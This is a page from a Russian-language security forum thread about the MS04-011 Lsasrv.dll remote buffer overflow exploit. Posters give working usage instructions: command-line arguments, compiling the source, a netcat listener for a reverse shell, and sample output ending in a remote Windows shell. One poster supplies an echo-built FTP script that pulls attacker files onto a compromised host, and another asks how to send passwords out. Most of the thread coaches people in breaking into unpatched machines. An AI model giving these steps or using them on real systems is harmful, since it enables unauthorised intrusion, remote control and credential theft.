Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 4 5 6 7 8 ... 19 След.
RSS
MS04011 Lsasrv.dll RPC buffer overflow remote exploit (PoC) with Un...
 
кто знает, воРм уже попёр под шумок?
 
Цитата
^n0th1ng^ пишет:
кто знает, воРм уже попёр под шумок?

ха-ха-ха.
да уж... тапереча не за горами
 
мда .... опять винда, и опять червь.
смахивает на rpcdcom эпидемию :)
 
Цитата
^n0th1ng^ пишет:
мда .... опять винда, и опять червь.
смахивает на rpcdcom эпидемию :)

имхо, эпидемии подобно rpcdcom не получится.
народ стал бдительней, файрволов понавтыкали, да и + 445 бдительными админами блокируется практичесик ве3де.
 
^n0th1ng^


ftp

не пашет

делаю open

просит ввести username ш все....не пашет дальше
 
Цитата
Гость пишет:
2 > [SpDOMINANT]
да просто, смотри :
<target> <victim IP> <bindport> [connectback IP] [options]
target = ось
victim IP = дырявая тачка
<bindport> = номер порта
[connectback IP] = твой айпи

варианты эксплуатации:
1)если ты не указываешь [connectback IP], то после эксплуатации коннктишься на bindport дырявой тачки
2)если ты указываешь [connectback IP], то предварительно ставишь неткат слушать <bindport> (и к тебе на <bindport> дропается шел)

Пример 1:
=======================================
С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4]       netrap.dll
[*] Connecting to 10.0.ххх.ххх:445 ... OK
[*] Attacking ... OK

c:\telnet 10.0.xxx.xxx 3333

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

E:\WINNT\system32>


Пример 2:
=======================================
(на своей машине)
С:\>nc -l -n -vv -p 3333
listening on [any] 3333 ...

С:\>HOD-ms04011-lsasrv-expl.exe 2 10.0.ххх.ххх 3333 10.0.yyy.yyy

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 10.0.ххх.ххх: OS: Win2k Advanced Server [SP4]       netrap.dll
[*] Connecting to 10.0.25.ххх:ххх:445 ... OK
[*] Attacking ... OK

в окне в nc:
H:\>nc -l -n -vv -p 3333
listening on [any] 3333 ...
connect to [10.0.yyy.yyy] from (UNKNOWN) [10.0.xxx.xxx] 2738
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

E:\WINNT\system32>


вот собственно и всё ...

Люди, кто умееет программировать и кому не жалко своего времени а так же жаба не задушит потом делиться ... добишите, пожалуйста, код, чтобы можно было указывать еще изходящий порт для бэк шела =)
Ок, спасибо...я так уже пробовал, наверно тачка залатана...Но теперь буду знать, что у кого-то это пашет.
 
Цитата
[SpDOMINANT пишет:
]  [QUOTE]Гость пишет:
2 > [SpDOMINANT]
Ок, спасибо...я так уже пробовал, наверно тачка залатана...Но теперь буду знать, что у кого-то это пашет.
да без проблем =)
 
А кто-нибудь отслеживал - на машине-жертве появляется новый процесс в момент атаки?
 
Цитата
Гость пишет:

ftp
не пашет
делаю open
просит ввести username ш все....не пашет дальше
используй анонимный FTP-сервер
когда он попросит ввсели пароль, жмешь ENTER.
 
Цитата
c00ker пишет:
еще раз для отстающих :)
компиляция при наличии visual studio:

заходим в коммандной строке в каталог с исходником:
C:\src\lsass>cl lsass.c /W0
Microsoft ® 32-bit C/C++ Optimizing Compiler Version 12.00.8804 for 80x86
Copyright © Microsoft Corp 1984-1998. All rights reserved.

/out:lsass.exe
lsass.obj
C:\src\lsass>lsass 0 192.168.0.1 1000 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.0.1: OS: WinXP Professional    [universal] lsass.exe
[*] Connecting to 192.168.0.1:445 ... OK
[*] Attacking ... OK

а для отстающих в win оболочке можно?
т.е. какой проэкт и где линки на *.lib прописывать?
 
Да вот Вы тут развели...детский сад "Ромашка"  [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]

Что-то в последнее время появилось очень большое кол-во ,так сказать, "новичков", желаюшь как бы что-нибудь где-нибудь сломать, напортить и т.д...об этом стоит задуматься!

Сплоит класный, уязвимых машин много, скорее всего будет очередной червь...

Best Regards, ShadoW
 
ЕПТ,,,,,,не коннектится по фтп... [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]

Хелп...
 
Кроме фтп,есть еще способ??или объясните популярно [IMG]http://www.securitylab.ru/forum/smileys/smiley18.gif[/IMG]
 
Меня тоже интересует как слить например пароли на инет ? :) Сплойт вообще суперский всё работает на 5+  [IMG]http://www.securitylab.ru/forum/smileys/smiley32.gif[/IMG]
 
Цитата
Гость пишет:
Кроме фтп,есть еще способ??или объясните популярно [IMG]http://www.securitylab.ru/forum/smileys/smiley18.gif[/IMG]

Zaka4ivat' mozno kak po ftp tak i po tftp.
~~~~FTP~~~~
Ustanavlivaesh u seby na ta4ke FTP-SERVER i razreshaesh anonimniy connect.
Potom pishes v polu4ennom shele :

echo open svoi_IP>1.txt
echo anonymous>>1.txt
echo pass>>1.txt
echo get fail_kotoriy_ti_xo4esh_zaka4at>>1.txt
echo bye>>1.txt

Potom daesh komandu:
ftp -s:1.txt

I zdes... Takim obrazom mozno kak zaka4ivat' tak i ska4ivat' faili.......
 
а как поставить FTP-SERVER?
 
Цитата
HecZ пишет:
Меня тоже интересует как слить например пароли на инет ? :) Сплойт вообще суперский всё работает на 5+  [IMG]http://www.securitylab.ru/forum/smileys/smiley32.gif[/IMG]

Paroli slit' mozno....  [IMG]http://www.securitylab.ru/forum/smileys/smiley4.gif[/IMG]
 
Цитата
Гость пишет:
а как поставить FTP-SERVER?

a eto o4en' strashnay i maloizvestnay taina.....
i ni na odnom poiskovike daze informatii ob etom net!
 
Цитата
mitnick пишет:
 
Цитата
Гость пишет:
Кроме фтп,есть еще способ??или объясните популярно [IMG]http://www.securitylab.ru/forum/smileys/smiley18.gif[/IMG]

Zaka4ivat' mozno kak po ftp tak i po tftp.
~~~~FTP~~~~
Ustanavlivaesh u seby na ta4ke FTP-SERVER i razreshaesh anonimniy connect.
Potom pishes v polu4ennom shele :

echo open svoi_IP>1.txt
echo anonymous>>1.txt
echo pass>>1.txt
echo get fail_kotoriy_ti_xo4esh_zaka4at>>1.txt
echo bye>>1.txt

Potom daesh komandu:
ftp -s:1.txt

I zdes... Takim obrazom mozno kak zaka4ivat' tak i ska4ivat' faili.......

гы)) я эту фишку помню еще с unicode бага... [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
 
Хвати хватит каждый получил что хотел но вот обучать остальному не надо как через фтп слить пароли итд итп лежит рабочая компилед версия и всё тут
и никаких echo open нефиг советовать и выпендриваться и лишний раз говорить "ВАУ ВАУ ВСЁ РАБОТАЕТ" !!очень много даунов тут!
введите наконец обязательную регистрацию.и всякие соски отвянут
Страницы: Пред. 1 ... 4 5 6 7 8 ... 19 След.
Читают тему